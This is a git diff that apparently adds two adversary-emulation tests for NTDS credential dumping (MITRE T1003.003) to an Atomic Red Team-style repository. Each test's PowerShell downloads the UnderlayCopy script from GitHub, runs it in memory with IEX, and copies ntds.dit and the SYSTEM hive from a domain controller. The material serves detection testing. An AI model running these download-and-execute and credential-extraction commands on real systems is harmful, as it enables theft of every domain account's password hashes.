diff --git a/atomics/T1003.003/T1003.003.md b/atomics/T1003.003/T1003.003.md
index b45b8ae0..d73307cd 100644
--- a/atomics/T1003.003/T1003.003.md
+++ b/atomics/T1003.003/T1003.003.md
@@ -36,6 +36,10 @@ The following tools and techniques can be used to enumerate the NTDS file and th
- [Atomic Test #9 - Create Volume Shadow Copy with diskshadow](#atomic-test-9---create-volume-shadow-copy-with-diskshadow)
+- [Atomic Test #10 - Copy NTDS in low level NTFS acquisition via MFT parsing](#atomic-test-10---Copy-NTDS-in-low-level-NTFS-acquisition-via-MFT-parsing)
+
+- [Atomic Test #11 - Copy NTDS in low level NTFS acquisition via fsutil](#atomic-test-11---Copy-NTDS-in-low-level-NTFS-acquisition-via-fsutil)
+
@@ -461,8 +465,76 @@ mkdir c:\exfil
diskshadow.exe /s #{filename}
```
+
+## Atomic Test #10 - Copy NTDS in low level NTFS acquisition via MFT parsing
+This test is intended to be run on a domain Controller.
+UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
+
+**Supported Platforms:** Windows
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| extract_path | Path for extracted NTDS.dit | path | C:\Windows\Temp|
+
+
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/kfallahi/UnderlayCopy/refs/heads/main/UnderlayCopy.ps1' -UseBasicParsing)
+Underlay-Copy -Mode MFT -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
+Underlay-Copy -Mode MFT -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
+```
+
+
+#### Cleanup Commands:
+```powershell
+remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
+remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
+```
+
+
+
+
+
+
+## Atomic Test #11 - Copy NTDS in low level NTFS acquisition via fsutil
+This test is intended to be run on a domain Controller.
+UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
+
+**Supported Platforms:** Windows
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| extract_path | Path for extracted NTDS.dit | path | C:\Windows\Temp|
+
+
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/kfallahi/UnderlayCopy/refs/heads/main/UnderlayCopy.ps1' -UseBasicParsing)
+Underlay-Copy -Mode Metadata -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
+Underlay-Copy -Mode Metadata -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
+```
+
+
+#### Cleanup Commands:
+```powershell
+remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
+remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
+```
+
diff --git a/atomics/T1003.003/T1003.003.yaml b/atomics/T1003.003/T1003.003.yaml
index 50f69f6b..f085d179 100644
--- a/atomics/T1003.003/T1003.003.yaml
+++ b/atomics/T1003.003/T1003.003.yaml
@@ -261,3 +261,58 @@ atomic_tests:
diskshadow.exe /s #{filename}
name: command_prompt
elevation_required: true
+- name: Copy NTDS in low level NTFS acquisition via MFT parsing
+ description: |
+ This test is intended to be run on a domain Controller.
+
+ UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
+ supported_platforms:
+ - windows
+ input_arguments:
+ extract_path:
+ type: string
+ default: C:\Windows\Temp
+ description: Path for extracted NTDS.dit
+ script_url:
+ description: URL to UnderlayCopy script
+ type: url
+ default: https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1
+ executor:
+ command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (IWR #{script_url} -UseBasicParsing)
+ Underlay-Copy -Mode MFT -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
+ Underlay-Copy -Mode MFT -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
+ name: powershell
+ elevation_required: true
+ cleanup_command: |
+ remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
+ remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
+
+- name: Copy NTDS in low level NTFS acquisition via fsutil
+ description: |
+ This test is intended to be run on a domain Controller.
+
+ UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
+ supported_platforms:
+ - windows
+ input_arguments:
+ extract_path:
+ type: string
+ default: C:\Windows\Temp
+ description: Path for extracted NTDS.dit
+ script_url:
+ description: URL to UnderlayCopy script
+ type: url
+ default: https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1
+ executor:
+ command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (IWR #{script_url} -UseBasicParsing)
+ Underlay-Copy -Mode Metadata -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
+ Underlay-Copy -Mode Metadata -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
+ name: powershell
+ elevation_required: true
+ cleanup_command: |
+ remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
+ remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue